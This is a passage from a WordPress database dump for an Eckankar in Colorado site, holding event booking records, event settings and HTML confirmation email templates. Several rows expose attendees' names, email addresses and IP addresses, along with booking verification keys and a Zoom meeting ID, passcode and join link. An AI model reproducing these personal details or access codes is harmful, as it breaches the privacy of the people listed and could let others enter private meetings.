\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"97.122.252.60\";}}'),(160653,266608,'mec_price','0'),(160654,266608,'mec_gateway','MEC_gateway_free'),(160655,266608,'mec_gateway_label','Free'),(160656,266609,'_field_224','Lee'),(160657,266609,'_field_225','Parimuha'),(160658,266609,'_field_226','andjustbe@gmail.com'),(160659,266609,'_field_227','CO'),(160660,266609,'_field_228','US'),(160661,266609,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(160662,266609,'_form_id','21'),(160663,266609,'_seq_num','148'),(160664,266610,'mec_transaction_id','PSA29618'),(160665,266610,'mec_user_id','1000002'),(160666,266610,'mec_verified','1'),(160667,266610,'mec_verification_key','9656a07449c0c861ee2db49ea6b632a1'),(160668,266610,'mec_cancellation_key','946d573f9a069fa464ca880e882d3fa1'),(160669,266610,'mec_confirmed','1'),(160670,266610,'mec_event_id','266573'),(160671,266610,'mec_date','1651401000:1651447800'),(160672,266610,'mec_ticket_id',',1,'),(160673,266610,'mec_booking_time','2022-05-01 10:34:46'),(160674,266610,'mec_all_dates','a:0:{}'),(160675,266610,'mec_other_dates','a:0:{}'),(160676,266610,'mec_attention_time','1651401000:1651447800'),(160677,266610,'mec_attention_time_start','1651401000'),(160678,266610,'mec_attention_time_end','1651447800'),(160679,266610,'mec_book_date_submit','20220501103446'),(160680,266610,'mec_booking_location','118'),(160681,266610,'mec_ticket_price_1','0'),(160682,266610,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"mugarugaandrew@gmail.com\";s:4:\"name\";s:6:\"Andre \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"98.202.145.108\";}}'),(160683,266610,'mec_price','0'),(160684,266610,'mec_gateway','MEC_gateway_free'),(160685,266610,'mec_gateway_label','Free'),(160692,266611,'mec_color',''),(160693,266611,'mec_location_id','144'),(160694,266611,'mec_dont_show_map','0'),(160695,266611,'mec_organizer_id','1'),(160696,266611,'mec_read_more',''),(160697,266611,'mec_more_info',''),(160698,266611,'mec_more_info_title',''),(160699,266611,'mec_more_info_target','_self'),(160700,266611,'mec_cost',''),(160701,266611,'mec_currency','a:0:{}'),(160702,266611,'mec_additional_organizer_ids','a:0:{}'),(160703,266611,'mec_additional_location_ids','a:0:{}'),(160704,266611,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"5\";}}'),(160705,266611,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Tue.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"5\";}'),(160706,266611,'mec_certain_weekdays','a:0:{}'),(160707,266611,'mec_allday','0'),(160708,266611,'one_occurrence','0'),(160709,266611,'mec_hide_time','0'),(160710,266611,'mec_hide_end_time','0'),(160711,266611,'mec_comment',''),(160712,266611,'mec_timezone','global'),(160713,266611,'mec_countdown_method','global'),(160714,266611,'mec_public','1'),(160715,266611,'mec_start_date','2022-05-17'),(160716,266611,'mec_start_time_hour','7'),(160717,266611,'mec_start_time_minutes','0'),(160718,266611,'mec_start_time_ampm','PM'),(160719,266611,'mec_start_day_seconds','68400'),(160720,266611,'mec_end_date','2022-05-17'),(160721,266611,'mec_end_time_hour','8'),(160722,266611,'mec_end_time_minutes','0'),(160723,266611,'mec_end_time_ampm','PM'),(160724,266611,'mec_end_day_seconds','72000'),(160725,266611,'mec_repeat_status','1'),(160726,266611,'mec_repeat_type','advanced'),(160727,266611,'mec_repeat_interval','1'),(160728,266611,'mec_repeat_end','occurrences'),(160729,266611,'mec_repeat_end_at_occurrences','4'),(160730,266611,'mec_repeat_end_at_date',''),(160731,266611,'mec_advanced_days','a:1:{i:0;s:5:\"Tue.3\";}'),(160732,266611,'mec_in_days',''),(160733,266611,'mec_not_in_days',''),(160734,266611,'mec_hourly_schedules','a:0:{}'),(160735,266611,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160736,266611,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:54:\"Online Book Discussion - \'Wisdom of the Heart, Book 4\'\";s:22:\"ticket_start_time_hour\";s:2:\"07\";s:24:\"ticket_start_time_minute\";s:1:\"0\";s:22:\"ticket_start_time_ampm\";s:2:\"PM\";s:20:\"ticket_end_time_hour\";s:2:\"08\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(160737,266611,'mec_fees_global_inheritance','1'),(160738,266611,'mec_fees','a:0:{}'),(160739,266611,'mec_ticket_variations_global_inheritance','1'),(160740,266611,'mec_ticket_variations','a:0:{}'),(160741,266611,'mec_reg_fields_global_inheritance','1'),(160742,266611,'mec_reg_fields','a:0:{}'),(160743,266611,'mec_bfixed_fields','a:0:{}'),(160744,266611,'mec_op','a:0:{}'),(160745,266611,'mec_fields','a:0:{}'),(160746,266611,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6026:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>893 6059 1133<br />\r\n<b>Passcode:</b> <span>264199</span></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89360591133?pwd=KzgxSitLdjJFQWZlWGI4Qnk1bENaQT09\">https://us02web.zoom.us/j/89360591133?pwd=KzgxSitLdjJFQWZlWGI4Qnk1bENaQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:10024:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(160747,266611,'mec_event_status','EventScheduled'),(160748,266611,'mec_moved_online_link',''),(160749,266611,'mec_cancelled_reason',''),(160750,266611,'mec_display_cancellation_reason_in_single_page',''),(160751,266611,'protect_children',''),(160752,266611,'passster_activate_global_protection',NULL),(160753,266611,'passster_activate_protection',NULL),(160754,266611,'passster_protection_type','password'),(160755,266611,'boldgrid_hide_page_title','0'),(160756,266611,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(160757,266611,'boldgrid_in_page_containers','1'),(160759,266611,'_dp_original','266543'),(160760,266611,'_edit_lock','1661359167:2'),(160761,266611,'_edit_last','2'),(160762,266612,'_wp_attached_file','2022/05/wisdom-of-the-heart-lscape-1.jpg'),(160763,266612,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:713;s:6:\"height\";i:398;s:4:\"file\";s:40:\"2022/05/wisdom-of-the-heart-lscape-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:40:\"wisdom-of-the-heart-lscape-1-300x398.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160764,266612,'smush-info','The file was compressed from 55.24 KB to 53.74 KB saving 2.72 percent using WP-Optimize'),(160766,266611,'_thumbnail_id','266612'),(160765,266612,'smush-complete','1'),(163244,266756,'_seq_num','23'),(163243,266756,'_form_id','4'),(163242,266756,'_field_39','I am updating my information because I have not been receiving either newsletters or HI emails.  Please let me know if there is some other way I need to get my information to the right person.  Thank 